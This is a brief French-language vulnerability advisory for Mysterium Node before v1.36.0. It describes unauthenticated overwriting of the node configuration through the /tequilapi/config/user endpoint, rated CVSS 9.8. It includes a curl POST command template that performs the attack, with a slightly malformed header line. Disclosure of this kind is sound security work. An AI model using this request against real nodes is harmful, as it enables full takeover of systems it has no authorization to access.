
Contrôle d'accès inapproprié dans Mysterium Node avant la version v1.36.0
Une autorisation inappropriée dans le point d'API /tequilapi/config/user de Mysterium Node de v1.21.1-rc0 avant v1.36.0 permet à un attaquant non authentifié de remplacer arbitrairement la configuration du nœud et d'obtenir une prise de contrôle complète du nœud via une requête POST malveillante.
Score: 9.8 (CRITIQUE)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
curl -X POST \
"Content-Type: application/json" \
-d @config.json \
http://<host>:<port>/tequilapi/config/user
Découvert par Till Schacht.